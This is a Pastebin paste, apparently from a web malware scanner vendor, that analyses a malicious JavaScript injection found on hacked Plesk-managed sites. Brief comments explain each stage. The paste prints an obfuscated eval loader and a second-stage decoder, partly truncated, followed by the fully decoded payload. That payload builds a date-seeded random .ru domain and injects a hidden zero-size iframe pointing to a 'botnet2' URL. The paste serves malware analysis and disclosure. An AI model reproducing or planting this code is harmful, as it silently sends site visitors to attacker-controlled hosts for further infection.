Advertisement
Guest User

Quttera web malware scanner API detected PLESK exploit JS

a guest
May 10th, 2013
356
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 4.96 KB | None
  1. /*
  2.  * Quttera web malware scanner API detected malicious JavaScript threat injecting malicious iframes
  3.  * leading to previously hacked web-sites managed by PLESK panel.
  4.  *
  5.  *
  6.  * First level of obfuscation injects obfuscated JavaScript code that further
  7.  * executed and injecting malicious iframes.
  8.  *
  9.  * The following code utilize pretty simple obfuscation technique based on generation of a string
  10.  * from list of characters
  11.  */
  12.  
  13. <script>
  14. /*km0ae9gr6m*/
  15. window.eval(String.fromCharCode(116, 114, 121, 123, 112, 114, 111, 116, 111, 116, 121, 112, 101, 37, 50, 59, 125, 99, 97, 116, 99, 104, 40, 97, 115, 100, 41, 123, 120, 61, 50, 59, 125, 116, 114, 121, 123, 113, 61, 100, 111, 99, 117, 109, 101, 110, 116, 91, 40, 120, 41, 63, 34, 99, 34, 43, 34, 114, 34, 58, 50, 43, 34, 101, 34, 43, 34, 97, 34, 43, 34, 116, 34, 43, 34, 101, 34, 43, 34, 69, 34, 43, 34, 108, 34, 43, 34, 101, 34, 43, 34, 109, 34, 43, 40, 40, 102, 41, 63, 34, 101, 34, 43, 34, 110, 34, ...
  16. 91, 102, 114, 43, 40, 40, 101, 41, 63, 34, 67, 111, 100, 101, 34, 58, 49, 50, 41, 93, 40, 40, 119, 91, 106, 93, 47, 40, 53, 43, 101, 40, 34, 106, 37, 50, 34, 41, 41, 41, 41, 59, 125, 10, 105, 102, 40, 102, 41, 101, 40, 115, 41, 59, 125, 10));
  17. </script>
  18.  
  19. /*
  20.  * second level of obfuscation injects more complicated code utilizing execution exceptions handlers
  21.  * and smartly initialize local variables basing on correct execution flow.
  22.  * Current decoding procedure
  23.  * is more complicated "w[j] / (5 + eval('j%2'))" and means that each element of characters array
  24.  * should be divided by 5 or 6 depending either it locates on even or odd place of this array.
  25.  */
  26.  
  27. <script>
  28. try {
  29.     prototype % 2;
  30. } catch (asd) {
  31.     x = 2;
  32. }
  33. try {
  34.     q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
  35.     q.appendChild(q + "");
  36. } catch (fwbewe) {
  37.     i = 0;
  38.     try {
  39.         prototype * 5;
  40.     } catch (z) {
  41.         fr = "fromChar";
  42.         f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, ...
  43. 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205, 354];
  44.         v = "eva";
  45.     }
  46.     if (v) e = window[v + "l"];
  47.     w = f;
  48.     s = [];
  49.     r = String;
  50.     z = ((e) ? "Code" : "");
  51.     for (; 1776 - 5 + 5 > i; i += 1) {
  52.         j = i;
  53.         if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
  54.     }
  55.     if (f) e(s);
  56. }
  57. </script>
  58.  
  59.  
  60. /*
  61.  * Finally decoded threat generates hidden iframes to random previously hacked *.ru domains
  62.  */
  63. <script>
  64. function nextRandomNumber() {
  65.     var hi = this.seed / this.Q;
  66.     var lo = this.seed % this.Q;
  67.     var test = this.A * lo - this.R * hi;
  68.     if (test > 0) {
  69.         this.seed = test;
  70.     } else {
  71.         this.seed = test + this.M;
  72.     }
  73.     return (this.seed * this.oneOverM);
  74. }
  75.  
  76. function RandomNumberGenerator(unix) {
  77.     var d = new Date(unix * 1000);
  78.     var s = d.getHours() > 12 ? 1 : 0;
  79.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  80.     this.A = 48271;
  81.     this.M = 2147483647;
  82.     this.Q = this.M / this.A;
  83.     this.R = this.M % this.A;
  84.     this.oneOverM = 1.0 / this.M;
  85.     this.next = nextRandomNumber;
  86.     return this;
  87. }
  88.  
  89. function createRandomNumber(r, Min, Max) {
  90.     return Math.round((Max - Min) * r.next() + Min);
  91. }
  92.  
  93. function generatePseudoRandomString(unix, length, zone) {
  94.     var rand = new RandomNumberGenerator(unix);
  95.     var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  96.     var str = '';
  97.     for (var i = 0; i < length; i++) {
  98.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  99.     }
  100.     return str + '.' + zone;
  101. }
  102.  
  103. setTimeout(function () {
  104.     try {
  105.         if (typeof iframeWasCreated == "undefined") {
  106.             iframeWasCreated = true;
  107.             var unix = Math.round(+new Date() / 1000);
  108.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
  109.             ifrm = document.createElement("IFRAME");
  110.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
  111.             ifrm.style.width = "0px";
  112.             ifrm.style.height = "0px";
  113.             ifrm.style.visibility = "hidden";
  114.             document.body.appendChild(ifrm);
  115.         }
  116.     } catch (e) {}
  117. }, 500);
  118. </script>
Advertisement
RAW Paste Data Copied
Advertisement